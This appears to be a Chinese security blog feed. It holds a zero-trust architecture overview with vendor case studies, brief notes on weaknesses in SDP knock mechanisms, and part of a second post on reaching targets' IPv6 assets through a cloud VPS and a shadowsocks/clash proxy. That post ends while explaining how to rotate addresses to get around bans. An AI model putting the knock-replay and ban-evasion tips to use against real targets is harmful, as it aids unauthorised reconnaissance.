2013 年，国际云安全联盟（CSA）成立软件定义边界（SDP）工作组。SDP 作为新一代网络安全解决理念，其整个中心思想是通过软件的方式，在移动和云化的时代，构建一个虚拟的企业边界，利用基于身份的访问控制，来应对边界模糊化带来的粗粒度控制问题。

2014 年，谷歌基于内部项目 BeyondCorp 的研究成果陆续发布 6 篇相关论文，介绍零信任落地实践。BeyondCorp 的设计采用了零信任的思想，假设所有网络都不可信；以合法用户、受控设备访问为主；所有服务访问都要进行身份验证、授权加密处理。

2017 年，Gartner 在安全与风险管理峰会上发布持续自适应风险与信任评估（Continuous Adaptive Risk and Trust Assessment, CARTA）模型，并提出零信任是实现 CARTA 的初始步骤，后续两年又发布了零信任网络访问（Zero-Trust Network Access, ZTNA）市场指南（注：SDP 被 Gartner 称为 ZTNA）。

2018 年，Forrester 提出零信任拓展生态系统（Zero Trust eXtended, ZTX）研究报告，将视角从网络扩展到用户、设备和工作负载，将能力从微隔离扩展到可视化、分析、自动化编排，并提出身份不仅仅针对用户，还包括 IP 地址、MAC 地址、操作系统等。简言之，具有身份的任何实体包括用户、设备、云资产、网络分段都必须在零信任架构下进行识别、认证和管理。

2020 年，美国国家标准技术研究所（NIST）发布的《SP800-207: Zero Trust Architecture》标准对零信任架构 ZTA 的定义如下：利用零信任的企业网络安全规划，包括概念、思路和组件关系的集合，旨在消除在信息系统和服务中实施精准访问策略的不确定性。该标准强调零信任架构中的众多组件并不是新的技术或产品，而是按照零信任理念形成的一个面向用户、设备和应用的完整安全解决方案。

2021 年，美国总统拜登发布行政命令，向云技术的迁移应尽可能采用零信任架构，并要求所有政府部门在60天内制定实现零信任架构的计划。这是美国首次以行政命令的方式，明确要求用零信任迭代过时的联邦网络安全模型。

2022 年，美国国防部正式公布《零信任战略》。该战略指出，当前和未来的网络威胁和攻击推动了对超越传统边界防御方法的零信任方法的需求，国防部打算在2027财年之前实施战略和相关路线图中概述的独特的零信任能力和活动。

从旧有边界体系到现在的端、网、云混合办公体系，零信任架构愈发重要。

为什么要做零信任

为什么要做零信任？最本质的，是因为我们有一些重要的数据或者权限需要保护，而现有安全体系在云原生时代已无法提供足够的保护。用户个人隐私数据，员工薪资数据，修改密码的权限，关闭关键系统的权限等等都是被保护的对象。这些数据和权限最初是由基于边界安全（Perimeter Security）的网络接入控制来保护的，比如公司内网和VPN，当一台设备连入公司内网后，就继承了获取这些数据和权限的权利。在传统的 IT 安全模型中，一个组织的安全防护像是一座城堡，由一条代表网络的护城河守护着。在这样的设置中，很难从网络外部访问组织的资源。同时，默认情况下，网络内的每个人都被认为是可信的。然而，这种方法的问题在于，一旦攻击者获得对网络的访问权，并因此默认受到信任，那么组织的所有资源都面临着被攻击的风险。

后来，人们又开始引入基于IP的或者基于用户名密码的访问控制，以及更加细粒度的基于身份和角色（Identity and Role）的访问控制。但是这些已经无法满足在云原生环境下，具有复杂IT系统的企业的数据和权限保护要求。

相比之下，零信任基于这样一种信念：企业不应该自动地信任其边界内或外部的任何东西，而是在授予访问权限之前，对试图连接到IT系统的任何人和东西进行验证。

从本质上讲，零信任安全不仅承认网络内部和外部都存在威胁，而且还假定攻击是不可避免的（或可能已经发生）。因此，它会持续监控恶意活动，并限制用户只能访问完成工作所需的内容。这有效地防止了用户（包括潜在的攻击者）在网络中横向移动并访问任何不受限制的数据。

零信任架构的组件

接下来我们来盘一盘当一个组织从头开始构建的零信任架构所要进行的工作。

端点和设备

端点和设备包括组织内或有权访问组织数据的任何设备、API 或软件服务。组织必须首先了解他们的全套设备、API 和服务。然后可以根据设备、API 和服务的现状实施符合组织现状的零信任策略。

接入设备管理

大多数零信任架构要求软件至少安装在一部分用户机器上。移动设备管理 (MDM) 是大多数组织跨其用户设备清单管理软件和配置的方式。

端点保护

端点保护软件安装在用户的机器上并扫描影响设备的已知威胁。端点保护软件还可用于强制遵守操作系统补丁和更新，避免机器受到常见系统漏洞的威胁。

资产盘点

端点保护软件和资产管理软件可用于跟踪所有已分发给用户的设备。应维护一份准确的设备列表，以跟踪哪些设备是有效的并且应该可以访问特定的应用程序。

还应在清单中检测和维护 API 和服务。可以利用网络扫描来识别可以通过内部或外部网络进行通信的新出现的 API 和软件服务。

网络

网络包括组织内的所有公共、专用和虚拟网络。组织必须首先了解他们现有的网络集并对其进行细分以防止横向移动。然后，可以创建零信任策略来精细控制用户、端点和设备可以访问的网络部分。

细分用户网络访问

用户通常可以使用 VPN 或在办公室网络中访问整个专用网络。零信任框架要求用户只能访问完成给定任务所需的特定网络部分。零信任网络解决方案允许用户远程访问本地网络，但具有基于用户、设备和其他因素的精细策略。

使用宽带互联网实现分支机构之间的连接

专用网络位置（例如数据中心和分支机构）之间的连接通常是使用多协议标签交换 (MPLS) 线路或电信提供商提供的其他形式的专用链路建立的。这些 MPLS 链路通常很昂贵，并且随着商品互联网的质量越来越高，组织可以通过安全隧道在互联网上路由流量，从而以一小部分成本提供相同级别的安全访问。

关闭所有向 Internet 开放的用于应用程序交付的入站端口

攻击者常常通过扫描网站/主机开放的端口扩大攻击面，零信任反向代理允许您在不打开任何入站端口的情况下安全地公开 Web 应用程序。应用程序的 DNS 记录是应用程序唯一公开可见的记录。DNS 记录受零信任策略保护。作为附加的安全层，可以使用零信任网络访问解决方案来利用内部/私有 DNS。

网络流量

互联网流量包括所有发往组织控制范围之外的网站的用户流量。这可以从业务相关任务到个人网站使用。所有出站流量都容易受到恶意软件和恶意网站的攻击。组织必须建立对发往 Internet 的用户流量的可见性和控制。

DNS 过滤

可以通过路由器配置或直接在用户机器上应用 DNS 过滤。它是保护用户免受已知恶意网站侵害的最快方法之一。

TLS 解密

有些威胁隐藏在 SSL 之后，仅通过 HTTPS 检查无法阻止。为了进一步保护用户，应该利用 TLS 解密来进一步保护用户免受 SSL 背后的威胁。

应用

应用程序包括存在组织数据或执行业务流程的任何资源。组织必须首先了解存在的应用程序，然后为每个应用程序建立零信任策略，或者在某些情况下阻止未经批准的应用程序。

应用资产盘点

大部分企业中都会存在一些影子资产，这些往往会成为攻击者的入口点或跳板。对于安全团队来说，了解他们在整个企业中使用的应用程序的完整清单至关重要。

应用程序的零信任策略实施

应用程序必须受到零信任策略的保护，该策略在验证和授权访问之前考虑用户身份、设备和网络环境。应用程序应具有执行最小特权的细化策略，尤其是对于包含敏感数据的应用程序。

保护应用程序免受第 7 层攻击

任何自托管应用程序都容易受到第 7 层攻击，包括 DDoS、代码注入、机器人等。安全团队的自托管web应用程序前部署 Web 应用程序防火墙和 DDoS 保护。

强制执行 HTTPS 和 DNSsec

任何自托管 Web 应用程序都应利用 HTTPS 和 DNSSec。这可以防止任何潜在的数据包嗅探或域劫持。

数据丢失防护和日志记录

到目前为止，一旦您建立了体系结构的所有零信任元素，您的体系结构将生成有关网络内部发生的事情的大量数据。此时，是时候实施数据丢失防护和日志记录了。这些是一组流程和工具，专注于将敏感数据保存在企业内部并标记任何潜在的数据泄漏机会。组织必须首先了解他们的敏感数据存在于何处。然后他们可以建立零信任控制来阻止敏感数据被访问和泄露。

建立记录和审查敏感应用程序流量的流程

安全 Web 网关解决方案具有将用户流量日志传递到 SIEM 工具的功能。安全团队应该定期检查发往敏感应用程序的流量日志。可以在 SIEM 中设置和调整针对异常或恶意流量的特定警报。

定义哪些数据是敏感数据及其存在的位置

这假设企业已经建立了安全 Web 网关或其他收集用户流量日志的方式。它应该提供对传输中、使用中和静态数据的可见性。

敏感数据因行业而异。例如技术公司关注保护源代码。确定公司的敏感数据及其存放位置非常重要。

敏感数据的准确定义和清单将为数据丢失防护工具的实施提供信息。

防止敏感数据离开您的应用程序

例如使用 DLP 解决方案检查用户流量和文件上传/下载是否有敏感数据。

敏感数据在众所周知的预定义列表（例如姓名、身份证、手机号等）中可用，或者管理员可以手动配置特定模式。应该为敏感应用程序启用 DLP 控制，并且可以针对所有用户流量进行扩展。

识别 SaaS 工具中的错误配置和公开共享的数据

定期扫描saas应用程序，查找已知的安全配置错误和已公开共享的数据。持续监控开源代码托管平台，技术写作平台，检测是否存在saas凭证泄漏，敏感资产数据泄漏。

关键及时的威胁情报数据

汇总多家厂商的威胁情报数据，对接到内部的威胁情报库，自动加载到web安全网关中，及时拦截恶意攻击者，保护用户免受攻击。

各厂案例

Google BeyondCorp/BeyondProd

Google在经历了Aurora事件后就开始着手内部的零信任架构建设。

2014 年，谷歌基于内部项目 BeyondCorp 的研究成果陆续发布 6 篇相关论文，介绍零信任落地实践。

BeyondCorp 的目标是：摒弃企业特权网络并开创一种全新访问模式

在这种全新的无特权网络访问模式下，访问只依赖于设备和用户凭证，而与用户所处的网络位置无关，无论用户是在公司“内网”、家庭网络、酒店还是咖啡店的公共网络，所有对企业资源的访问都要基于设备状态和用户凭证进行认证、授权和加密。

这种新模式可以针对不同的企业资源进行细粒度的访问控制，所有谷歌员工都可以从任何网络成功发起访问，无需通过传统的 VPN 连接进入特权网络，除了可能存在延迟差异外，对企业资源的本地和远程访问用户体验基本一致。

2015年，Google公开了他们的架构Borg容器化（论文地址：https://research.google/pubs/pub43438/），Borg 是 Google 的集群管理系统，用于大规模调度和运行工作负载。Borg 是 Google 的首个统一容器管理系统，也是 Kubernetes 的灵感来源。Google 的基础架构将工作负载作为单独的微服务部署在容器中，并使用 Borg（容器编排系统）管理这些工作负载。这就是如今众所周知的“云原生”架构的灵感和模板。

Google 的基础架构在设计时就充分考虑了安全性，而不是后来才想起要添加安全功能。Google的基础架构假定其服务之间不应互相信任，也就是在Borg的过程中涉及了ALTS（在容器层上构建了一套基础设施安全层），默认开启加密mTLS、默认针对gRPC进行鉴权和授权以及默认身份绑定实体（人、机器、容器）等，同时Google为了提升安全性，把可信计算也加入了其中，为达到的目的就是保证整个身份体系中整个ALTS根证书的安全性。

2019年,Google发布白皮书BeyondProd: A new approach to cloud-native security,介绍了其最新的云原生安全模型。

BeyondProd 有意收回了 BeyondCorp 的概念。正如边界安全模型不再适合最终用户一样，BeyondCorp 也不再适用于微服务。对原始 BeyondCorp 论文的修改：“此模型的关键假设已不再成立：边界不再仅仅是企业 [数据中心] 的实际位置，并且边界内的领域不再是托管~~个人计算设备和企业应用~~ [微服务] 的安全可靠之处”。

于是正如 BeyondCorp 帮助google超越了基于边界的安全模型一样，BeyondProd 在生产环境安全性方面实现了类似的飞跃。BeyondProd 方法描述了一种云原生安全架构，该架构假定服务之间没有信任、隔离工作负载、验证是否仅部署了集中构建的应用、自动执行漏洞管理以及对重要数据强制执行有力的访问权限控制。基于 BeyondProd 架构，Google 开发了多个新的系统，以满足这些要求。

在用BeyondCorp实现开发环境（Corp Environment）的零信任时，Google以人为本，对员工进行身份管理和多因子认证。与此同时，建立了一套管理公司设备的流程，每个公司设备都配备TPM模块和操作系统完整性验证。这两项工作确保了正确的人用正确的设备提供可信的认证信息。最后，再利用这些认证信息对员工访问开发环境进行持续访问控制。

在用BeyondProd实现生产环境（Prod Environment）的零信任时，Google同样试图以人和流程作为信任的根本。BeyondProd面对的问题是，生产环境并不存在与人的直接交互，于是建立了一套把生产环境中的软件溯源到这些软件的开发者（Software Provenance)，从对开发者的认证和开发流程的加固开始，确保没有任何单人能够改变生产环境中的软件的行为（No Unilateral Change)。

接下来从2个Google零信任部署实例(BeyondProd)来看其建设逻辑：第一个是用户如何获取自己的数据，第二个是开发者如何通过修改源代码来改变生产环境中的数据访问行为。谷歌对这两个案例的数据访问控制都遵循零信任的原则。

用户访问自己的数据

当用户通过谷歌的服务访问自己的数据时，请求会通过用户和Google Front End(GFE)之间的加密连接（TLS）首先到达GFE。GFE转用更加高效和安全的协议和数据结构将用户请求分发到各个后端服务共同完成用户请求。例如TLS会被换为Application Layer TLS(ATLS)。面向用户的口令会被转换为更加安全的End User Context Ticket(EUC)。这些置换旨在根据实际请求降低内部连接和令牌的权限，使得特定的ATLS和EUC只能访问局限于此次请求的数据和权限。

开发者改变软件数据访问行为

当开发者希望通过改变服务的代码来改变一个服务的数据和权限访问行为时（开发者无法获取生产主机的任意指令运行权限，如SSH）,该代码修改会经过一系列的流程来将对开发者及其团队的信任转化为对新的服务的信任：流程中所有涉及的人员均通过多因子认证来确立身份，代码修改会被一个或以上有审批权限的人评估，只有获得足够多的授权的代码才会被合并入中央代码库，中央代码库的代码会被一个同样受BAB保护的可信构建服务集中构建，测试和签名，构建后的软件会在部署环节通过目标服务的BAB策略认证（比如GMail的服务只能运行代码库特定位置的经过充分代码评估和测试的代码），软件运行时也会根据相应的BAB安全策略进行运行时隔离：不同BAB服务策略管辖的服务会被运行在不同的隔离区。

为了实现整套流程，google实现了以下几项内部安全工具/服务

在边缘保护网络，Google Front End (GFE)，用于管理传输层安全协议 (TLS) 终止和传入流量政策

Google Front End (GFE)：终止与最终用户的连接，并为强制执行传输层安全协议 (TLS) 最佳做法提供一个中心点。即使重点已不再是基于边界的安全性，但 GFE 仍是保护内部服务免受拒绝服务攻击的重要策略部分。GFE 是用户连接到 Google 的第一个入口点；在基础架构中，GFE 还负责根据需要在区域之间平衡负载和重新路由流量,是将流量路由到适当微服务的边缘代理。

流量传输方面，自行开发了应用层传输安全 (ALTS)，用于远程过程调用 (RPC) 身份验证、完整性、加密和服务身份

应用层传输安全 (ALTS)：用于远程过程调用 (RPC) 身份验证、完整性和加密。ALTS 是一种用于 Google 基础架构服务的相互身份验证和传输加密系统。身份通常绑定到服务，而不是绑定到特定的服务器名称或主机。这有助于实现跨主机的无缝微服务复制、负载平衡和重新调度。

在代码可信方面，使用适用于 Borg 的 Binary Authorization (BAB)，用于代码出处验证,主机完整性 (HINT)，用于机器完整性验证

适用于 Borg 的 Binary Authorization (BAB)：一种部署时强制执行检查，用于确保代码在部署之前满足内部的安全性要求。BAB 检查包括由另一位工程师审核更改的内容、将代码提交到源代码库，以及在专用基础架构上以可验证的方式构建二进制文件。在基础架构中，BAB 会限制未经授权的微服务的部署。
主机完整性 (HINT)：通过安全启动过程验证主机系统软件的完整性，并基于受支持的安全微控制器硬件运行。HINT 检查包括 BIOS、BMC、引导加载程序和操作系统内核上的数字签名验证。

用于跨服务强制执行一致政策的关卡，服务访问政策，用于限制服务之间的数据访问方式，最终用户上下文 (EUC) 标签，用于证明原始请求者的身份

服务访问政策：限制服务之间的数据访问方式。当远程过程调用 (RPC) 从一项服务发送到另一项服务时，服务访问政策会定义访问接收服务数据所需的身份验证、授权和审核政策。这样会限制数据的访问方式、授予所需的最低访问权限级别，以及指定如何审核该访问权限。在 Google 的基础架构中，服务访问政策会限制一项微服务对另一项微服务数据的访问，并允许从全局级别分析访问控制措施。
最终用户上下文 (EUC) 标签：这些标签由最终用户身份验证服务发出，并为服务提供用户身份（独立于其服务身份）。这些是受到完整性保护、集中发放、可转发的凭据，用于证明发出服务请求的最终用户的身份。这样可以减少服务之间的信任需求，因为通过 ALTS 的对等方身份通常不足以授予访问权限，此类授权决策通常也基于最终用户的身份。

简单、自动化、标准化的更改发布，Borg 工具，用于蓝绿部署

用于蓝绿部署的 Borg 工具：此工具负责在执行维护任务时迁移正在运行的工作负载。除了现有的 Borg 作业之外，系统还会部署新的 Borg 作业，负载平衡器会逐渐将流量从一项作业转移到另一项作业。这样，在用户不知不觉中，系统就可以在不停机的情况下更新微服务。此工具用于在添加新功能时应用服务升级，以及在不停机的情况下应用重要的安全更新（例如，针对“心脏出血”Bug 和 Spectre/Meltdown 漏洞的安全更新）。对于影响 Google Cloud 基础架构的更改，会使用实时迁移来确保虚拟机工作负载不受影响。

工作负载之间进行隔离，gVisor，用于工作负载隔离

gVisor，用于工作负载隔离。gVisor 使用用户空间内核来拦截和处理系统调用，从而减少与主机和潜在攻击面的交互。此内核提供了运行应用所需的大部分功能，并限制应用可访问的主机内核表面。在 Google 的基础架构中，gVisor 是用于隔离同一主机上运行的内部工作负载和 Google Cloud 客户工作负载的几种重要工具之一。

Illumio

Illumio创立于2013年，与一众注重于端侧(身份与访问管理)的厂商不同，Illumio将产品定位在微分段(微隔离).

微分段（Micro-Segmentation，又称微隔离）技术是VMware在应对虚拟化隔离技术时提出来的，但引起广泛关注是自2016年起连续3年进入Gartner年度安全技术榜单。顾名思义，微分段是粒度更细的网络分段技术。它是在VLAN、VxLAN、VPC等技术基础上发展起来的，其核心能力聚焦于东西向流量的隔离上。

传统上，公司使用部署在网络边缘（主要是防火墙）的各种安全工具来保护其网络边界。主要重点是筛选网络和外部流量源之间的南北向流量。这些工具就像保护城堡的护城河，“城堡”（网络边界）内的居民天生就值得信任。

随着云的出现和自带设备（BYOD）等趋势，事情变得更加复杂。东西向流量、数据中心内和分布式系统之间的流量大幅增长。保护边界变得越来越困难，并且需要在组织需要保护的每个宝贵资产周围创建多个微边界。

这就是微分段的用武之地。它允许网络管理员在其分布式基础架构中创建安全的"孤岛"，并控制所有类型的用户对这些孤岛的访问，无论他们是从各种位置登录的外部人员、客户还是员工。

Illumio提供微分段解决方案Illumio Core.该方案实时检测检测横跨不同运算环境之间的工作负载可见性，根据工作负载的通信方式产生微分段策略，对每个主机中的本地状态实施防火墙规则。

Illumio Core包含兩大元件，分別是虚拟执行节点 (VEN) 及策略运算引擎 (PCE) 。

VEN是一种轻量级代理，安装在主机的客户操作系統 (Guest OS) 中，执行两个关键功能：第一，收集有关工作负载的操作系统、接口、进程和流的信息并将其传输到PCE。每个VEN可作为一个可视点及传感器，检测违规行为。此功能为应用程式的行为设定安全基线并创建规则，以检测未经授权的连接和策略偏差。第二，接收应用防火墙规则并对主机的第3层/第4层状态防火墙进行编程。VEN程式支持多个操作系统 (Windows、Linux、AIX、Solaris) 和容器，以及交换机、负载均衡器和安全架构内的混云 (公共、私有、混合) 环境。 PCE是从VEN收集所有遥测信息的大脑，通过实时应用程式关系图将其可视化，然后根据有关环境、工作负载和进程的上下文信息推荐最佳防火墙规则。这些规则被传输回VEN，可对每个主机的第3层/第4层防火墙进行编程。PCE可以通过Illumio的SaaS平台、本地和虚拟私有云中部署。

2020年3月，Illumio聘请Bishop Fox，测试Illumio微分段场景下对红队横向移动行为的限制性。相应报告可见 https://www.illumio.com/resource-center/research-report/efficacy-micro-segmentation-assessment-report

报告中模拟了3个测试用例和一个对照组，并在第二个用例不断提高工作负载数量，用于验证微分段策略的有效性。红队攻击者通过ssh密钥进行横向，以获取pgsql数据库中的数据为目标。

对照组为扁平网络，允许每个主机彼此通信，没有任何过滤和拦截策略。

用例1启用了Illumio-VEN代理，进行了微分段(环境分离)。

用例2启用了Illumio-VEN代理，并设置了附加的微分段(应用程序隔离)。

用例3启用了Illumio-VEN代理，并且进行了基于层的微分段。

3种测试策略的不同点如下

环境分离可以理解为：生产主机只能与生产主机对话，而开发只能与开发对话等。

应用程序隔离是指同一应用程序和同一环境中的主机和工作负载之间可以进行通信，但不允许进行其他任何通信。

基于层的分段是最细粒度的微分段形式之一，只有在相同的环境、相同的应用程序、相同的应用程序层中的工作负载，才能相互通信。

相应测试结果如下图

根据报告显示，与对照环境（扁平网络场景）相比，对于100个工作负载环境，攻击者分别需要300%（用例1）、450%（用例2）和950%（用例3）的时间来获得crown_jewels数据库。

该团队发现，尽管网络上发现的主机数量在不同的测试用例之间有所不同，但他们能够成功地枚举所有这些主机。然而，在对照环境测试和用例3之间，发现的服务数量线性减少了44%（从293个已识别的服务减少到130个）。

简言之，微分段策略越紧（从对照测试，到用例1，再到用例2，再到用例3），当对手试图横向移动时，对他们造成的困难就越大。此外，只要在整个企业中一致地应用微分段策略，即便微分段的级别（策略的粒度）保持不变，也有显著的可度量的好处。

在2022年，Illumio又聘请Bishop Fox，测试Illumio微分段场景下对域环境下横向和C2行为的限制性。相应报告可见 https://www.illumio.com/resource-center/research-report/bishop-fox-ransomware-scenario-emulation-assessment ,这里不多做描述.

蔷薇灵动

蔷薇灵动是国内做微隔离比较有名的，也在国内有落地案例。

以光大银行全栈云微隔离建设实践案例为例，看看蔷薇灵动的方案。

中国光大银行（以下简称“光大银行”）成立于1991年8月，光大银行一直积极拥抱云计算技术，坚持从业务需求出发服务金融应用，不断建设发展云平台，目前已进入云平台3.0——全栈云平台建设阶段，并初步完成“双栈并举、一栈多芯”两地多中心分布式云化数据中心经建设，构建了全行级统一数字化基础设施体系。

项目前期，光大银行已建成了混合架构全栈云（生产云+开发测试云)，采用青云、华为云双架构，X86/ARM双技术栈。而随着容器平台的投产，容器网络中的IP地址已失去其本身的秩序，基于IP的静态策略自然不再有效。需要通过微隔离系统在云平台中建立逻辑边界，实现业务间互访控制，并通过微隔离系统的统一策略框架提升访问控制精细度和效率。由此开始，光大银行正式踏上了微隔离技术的探索之路。

蔷薇灵动针对行方提出的微隔离需求，进行了方案设计及验证，最终在现网生产环境成功交付。方案以蔷薇灵动蜂巢安全自适应微隔离平台为主体，利用蜂后安全计算中心（QCC）、蜂群安全守护容器（BDC）和蜂群安全管理终端（BEA）三大核心组件，完成对数据中心的跨地域、跨平台、跨集群统一管理。

项目实施以“五步法”为指引开展。所谓“五步法”，是指定义、分析、设计、防护和运维5个关键步骤，是蔷薇灵动总结出的一套微隔离实施方案。

定义阶段，主要完成系统的部署和工作负载纳管。 首先，为满足光大银行近万点规模的统一管理需求，蔷薇灵动在计算中心的部署上进行了充分的性能和可用性保障设计，将一个多机计算中心集群分布部署于同城的两个双活数据中心中，实现了工作负载就近接入、双集群A/A备份的效果。其次，针对容器环境，采用了基于DaemonSet的“无代理”模式部署，通过自动化的守护容器部署，省去了在各节点安装Agent的繁冗，实现了光大银行“原生化部署运行”。

分析阶段，主要对工作负载进行分组和标签化管理，并为安全策略与IP的解耦打下基础。 项目过程中，行方以微隔离实施为抓手，对已有的资产管理数据及现用的业务属性标签规范进行了梳理和优化，实现了高效的分组和标签化。例如，在云原生环境中，容器自身的标签体系被微隔离系统直接复用，通过容器Namespace的名称作为分组，并利用app label的键值作为各容器角色标识。

设计阶段，主要梳理出东西向访问的基线。 对于光大银行，业务容器上线时，业务需要提交应用的访问需求，这些信息可以从CMDB系统中直接获得。除此之外，在过去云平台中的防火墙、安全组中，运行着一些访问控制策略，这些策略经分析选择，也可通过工具自动化的导入微隔离系统。对于仍未覆盖的少部分策略，可以利用连接可视化分析能力，与业务部门逐条确认。

防护阶段，主要完成安全策略的下发与执行。 微隔离策略的下发并非“一蹴而就”，而是需要经过一定时间的效果仿真和试运行，因此专业微隔离系统通常具有多种策略生效模式，例如“仅定义不下发”的建设模式、“仅下发不阻断”的测试模式或“完全执行”的防护模式。光大银行的业务容器投产前会先后运行于开发、测试、投产验证和生产环境，而微隔离能力是在最初的开发环境便开始生效，不同环境可根据用户的需求灵活的选择策略生效模式。

至此，微隔离实施的主要工作已基本完成，系统将进入运维阶段。 目前，光大银行正在积极尝试将微隔离系统与ITSM、SOC等外部系统打通，实现智能化的策略变更和优化。

项目的几个点

通过“主机代理”的微隔离技术路线，实现了多云平台、容器平台、多集群的无差别统一纳管，做到了“基础架构无关”，也再次证明了“主机代理”微隔离技术路线在面对大型机构复杂环境时体现出的技术优越性。同时，方案创新性地通过守护容器（DaemonSet）的方式，将微隔离的策略执行点深植于云原生环境中，实现了专业微隔离能力向云原生的内嵌融合。
针对云内虚拟的工作负载，基于系统的“标签”体系，为工作负载在IP层之上建立起了一套脱离于基础设施、面向业务属性的、基于“身份”和“角色”的管理分层，从而应对云内资产高度动态、弹性的特点，实现了安全策略随工作负载迁移、扩缩容而动态自适应更新。
- 跨云，跨平台，跨系统的管理视角，我理解就是把视图概括了云，数据中心，主机，应用程序，这几个细粒度。
通过API打通了微隔离和多套管理系统的数据通道，完成了管理和运行数据的对接，实现了自动化的策略运维能力，从而使得微隔离完全适应并符合用户DevSecOps的运行流程，安全策略能够随工作负载的生成而同步生效，微隔离系统真切成为了云内安全的基础设施。
- 这里是对平台自动化能力的体现，通过策略配置自动生效，自动同步

安全风险

SDP

敲门包可逆

部分零信任解决方案为了支持不同平台会有多种客户端，不同的客户端可能会采用不同的敲门方式，甚至不同的敲门协议，如果存在http/grpc/websocket这种，可尝试中间人嗅探，并逆向敲门包，进行伪造，或重放。

UDP敲门SNAT漏洞

攻击者和合法用户都在同一栋大楼里上班，在公司同一个网段里，对外访问网络时需要SNAT源地址转换，对外敲门的访问IP在网关和SPA 敲门处理服务看来都是一样的，因此当零信任网关对合法用户放通访问端口的时候，攻击者也可以通过该端口对网关进行访问攻击。

解决方案主要有两种

改UDP敲门为TCP敲门，敲开后复用TCP连接进行通信，但会牺牲安全性，需要防范TCP syn ddos攻击。但是TCP的敲门稳定性更为优越，有利有弊吧。
敲开门后，访问网关携带身份信息，这是最有效的解决方案。

UDP放大DDOS

由于采用的UDP包进行窍门，因此就存在UDP放大攻击的风险，当响应包远远大于请求包时，便可利用进行ddos。

解决方案

将放大倍率小于1，不存在dos的优势。

网关

通用的web漏洞

很多网关其实就和常见的web应用一样，组件漏洞，通用漏洞都是可能存在的。

总结

业内许多厂家对于什么是零信任，有着不同的答案，这也导致各家不同的零信任观点，将大多数甲方整的云里雾里，直呼“不觉明厉”。对于零信任，不必太过拘泥于定义和理论，而是要把它跟实践相结合，从具体的要解决的问题和应用场景出发。

Source & Reference

ipv6攻击视角

Thu, 29 Dec 2022 12:00:00 +0800

前段时间，突然对ipv6这块的资产收集感兴趣,分享下实践出的技巧和方案。

info

本文首发先知社区 https://xz.aliyun.com/t/11986

如果目标有 ipv6 资产，你如何访问

获得ipv6地址

最简单的方法购买提供ipv6地址的vps

vultr

比如vultr,购买时选择启用ipv6地址即可

aws

aws的机器默认没有ipv6地址分配，要按如下步骤来开启

vpc添加ipv6 CIDR
vpc子网分配ipv6 CIDR块
创建ec2机器时选择自动分配ipv6 ip

这个时候ip a就可以看到ipv6地址了

但是到这一步你会发现获取到了ipv6地址，但无法访问任何ipv6站点，这是因为这个vpc的路由表默认没有ipv6出口路由，手动配置如下

华为云

华为云和aws的步骤类似,现在vpc的subnet中开启ipv6功能,然后在创建ecs时选择分配ipv6地址

阿里云

类似,vpc配置开启ipv6,创建ecs时选择ipv6的子网，创建完毕需要开通ipv6公网带宽

然后在开启的机器上运行以下命令,获取ipv6地址

1
2
3

wget https://ecs-image-utils.oss-cn-hangzhou.aliyuncs.com/ipv6/rhel/ecs-utils-ipv6
chmod +x ./ecs-utils-ipv6
./ecs-utils-ipv6

开启ipv6公网带宽

如何让客户端访问ipv6站点

临近饭点，老吴问我如何让自己机器访问ipv6地址，因为如果只能通过vps进行访问，那一些图形化操作无法实现。

想了想，确实有道理，简单分析下，如果要让客户端访问到ipv6机器，那么要么客户端获取公网ipv6地址，要么走一些ipv6代理服务，比如https://proxyline.net/zh-hant/ipv6/。

获取公网ipv6地址不太可行，ipv6代理服务没必要，能自建干嘛要买。看网上文章里讲socks5，不用管客户端是ipv4还是ipv6协议，只要服务端是ipv6协议就可以让客户端畅通无阻的在ipv6环境下进行通讯。

那么我可以复用之前的clash代理池设计，只要节点端可以通ipv6，应该就可以了。

先看能不能访问

ipv6.ip.sb
ip.sb

正常来讲，无法访问。

下面配置一个aws服务器起ssr

先按照开始的教程为aws配置ipv6子网，确保机器可以通ipv6

1
2

curl ipv6.ip.sb
# 能够正确获取到ipv6地址,这个机子就可以用

起ssr服务

apt-get update
apt-get install -y shadowsocks-libev
systemctl status shadowsocks-libev

vim /etc/shadowsocks-libev/config.json
{
        "server":["::0","0.0.0.0"],
        "server_port":60001,
        "method":"chacha20-ietf-poly1305",
        "password":"1234567890",
        "mode":"tcp_and_udp",
        "fast_open":false
}

service shadowsocks-libev restart
# service shadowsocks-libev start
service shadowsocks-libev status

ps ax | grep ss-server

ss -tnlp

这里密码我随便设置了，如果生产环境不要用弱口令

启动ssr后，写一下clash配置

mixed-port: 64277
allow-lan: true
bind-address: '*'
mode: rule
log-level: info
ipv6: true
external-controller: 127.0.0.1:9090
routing-mark: 6666
hosts:

profile:
  store-selected: false
  store-fake-ip: true

dns:
  enable: false
  listen: 0.0.0.0:53
  ipv6: true
  default-nameserver:
    - 223.5.5.5
    - 8.8.8.8
  enhanced-mode: fake-ip # or redir-host (not recommended)
  fake-ip-range: 198.18.0.1/16 # Fake IP addresses pool CIDR
  nameserver:
    - 223.5.5.5 # default value
    - 8.8.8.8 # default value
    - tls://dns.rubyfish.cn:853 # DNS over TLS
    - https://1.1.1.1/dns-query # DNS over HTTPS
    - dhcp://en0 # dns from dhcp
    # - '8.8.8.8#en0'

proxies:
  - name: "1.14.5.14"
    type: ss
    server: 1.14.5.14
    port: 60001
    cipher: chacha20-ietf-poly1305
    password: "1234567890"

proxy-groups:
  - name: "test"
    type: load-balance
    proxies:
      - 1.14.5.14
    url: 'http://www.gstatic.com/generate_204'
    interval: 2400
    strategy: round-robin

rules:
  - DOMAIN-SUFFIX,google.com,test
  - DOMAIN-KEYWORD,google,test
  - DOMAIN,google.com,test
  - GEOIP,CN,test
  - MATCH,test
  - SRC-IP-CIDR,192.168.1.201/32,DIRECT
  - IP-CIDR,127.0.0.0/8,DIRECT
  - DOMAIN-SUFFIX,ad.com,REJECT

1.14.5.14是我这台aws的地址，60001是监听端口。这不是重点，重点在于2行ipv6: true

ipv6: true

dns:
  enable: false
  listen: 0.0.0.0:53
  ipv6: true

必须要配置为true

导入clash配置，再次测试访问

到了这一步,还是不够,因为目前是基于域名的ipv6访问,如果要直接访问ipv6地址，你会发现还是访问不了,那么该如何做呢

首先，在浏览器中访问ipv6地址，需要在前后加括号,例如 http://[2409:8c0c:310:314:💯38]/#/login
在burp中的代理配置，需要改成socks5代理,不能是upstream proxy servers

现在在浏览器中访问ipv6地址，就可以了

如果你ipv6地址被封了，如何更改

云服务器ipv6地址绑定(vultr可行，aws不可行)

运营商一般会分配 /64 甚至 /60 的地址，有相当多的 ipv6 可以用

我们可以访问完一次，用命令直接改一下本机对应的 ipv6 地址就好了，譬如只改地址后 64 bits

ip a 查看,vultr给了如下的ipv6地址

1
2

